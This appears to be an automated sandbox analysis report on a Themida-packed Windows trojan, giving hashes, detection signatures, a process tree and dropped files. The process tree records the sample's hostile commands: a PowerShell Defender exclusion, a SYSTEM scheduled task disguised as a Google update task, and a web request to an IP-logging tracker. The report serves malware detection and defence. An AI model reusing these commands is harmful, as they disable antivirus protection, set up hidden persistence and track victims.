Overview

overview

10

Static

static

7

5bf224d571...a6.exe

windows7-x64

10

5bf224d571...a6.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    92s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/04/2024, 01:49

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe

  • Size

    10.2MB

  • MD5

    d21a17b082c180ab291d60acd6472c08

  • SHA1

    221a714c7ea143399c9dad504b12b29be2f62bc9

  • SHA256

    5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6

  • SHA512

    92c458492154aa35c5e03f313e59c4b0ebe5eb8a71643ca74e0b20d48a4a74ca1806599cfd2c096c74c3022885ead8e7ec1caf13852fea400b85d615c2639448

  • SSDEEP

    196608:/H4wkCR3Peo3+hwP4Ff8Qg+rho+hs8sZbLV2dfN+zvidCGVgaYXMB0lvbWDjpqHi:/4wkCd3+hDEQLbs8ybLu4Did5gaYXMB1

Score
10/10
evasionthemidatrojan

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3500
      • C:\Users\Admin\AppData\Local\Temp\5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe
        "C:\Users\Admin\AppData\Local\Temp\5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Drops file in Drivers directory
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:3392
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3100
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:2072
        • C:\Windows\System32\schtasks.exe
          C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\bicubkbzonui.xml"
          2⤵
          • Creates scheduled task(s)
          PID:1776
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Invoke-WebRequest -Uri "https://iplogger.com/ZvWn8"
          2⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1760

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
              Filesize

              2KB

              MD5

              d85ba6ff808d9e5444a4b369f5bc2730

              SHA1

              31aa9d96590fff6981b315e0b391b575e4c0804a

              SHA256

              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

              SHA512

              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              944B

              MD5

              6d3e9c29fe44e90aae6ed30ccf799ca8

              SHA1

              c7974ef72264bbdf13a2793ccf1aed11bc565dce

              SHA256

              2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

              SHA512

              60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b2ctt4mz.ayx.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\bicubkbzonui.xml
              Filesize

              1KB

              MD5

              546d67a48ff2bf7682cea9fac07b942e

              SHA1

              a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90

              SHA256

              eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a

              SHA512

              10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

              Download Submit

            • memory/1760-46-0x00007FFF263E0000-0x00007FFF26EA1000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/1760-44-0x0000021ACFC30000-0x0000021ACFC40000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1760-43-0x0000021ACFC30000-0x0000021ACFC40000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1760-41-0x0000021AD29C0000-0x0000021AD3166000-memory.dmp

              Filesize

              7.6MB

              Download

            • memory/1760-30-0x0000021ACFC30000-0x0000021ACFC40000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1760-29-0x0000021ACFC30000-0x0000021ACFC40000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1760-28-0x00007FFF263E0000-0x00007FFF26EA1000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/3100-18-0x0000021049220000-0x0000021049230000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3100-22-0x00007FFF263E0000-0x00007FFF26EA1000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/3100-16-0x00000210652E0000-0x0000021065302000-memory.dmp

              Filesize

              136KB

              Download

            • memory/3100-19-0x0000021049220000-0x0000021049230000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3100-17-0x00007FFF263E0000-0x00007FFF26EA1000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/3392-0-0x0000000140000000-0x00000001412EC000-memory.dmp

              Filesize

              18.9MB

              Download

            • memory/3392-5-0x00007FFF453F0000-0x00007FFF455E5000-memory.dmp

              Filesize

              2.0MB

              Download

            • memory/3392-3-0x0000000140000000-0x00000001412EC000-memory.dmp

              Filesize

              18.9MB

              Download

            • memory/3392-2-0x0000000140000000-0x00000001412EC000-memory.dmp

              Filesize

              18.9MB

              Download

            • memory/3392-1-0x00007FFF453F0000-0x00007FFF455E5000-memory.dmp

              Filesize

              2.0MB

              Download

            • memory/3392-47-0x0000000140000000-0x00000001412EC000-memory.dmp

              Filesize

              18.9MB

              Download

            • memory/3392-48-0x00007FFF453F0000-0x00007FFF455E5000-memory.dmp

              Filesize

              2.0MB

              Download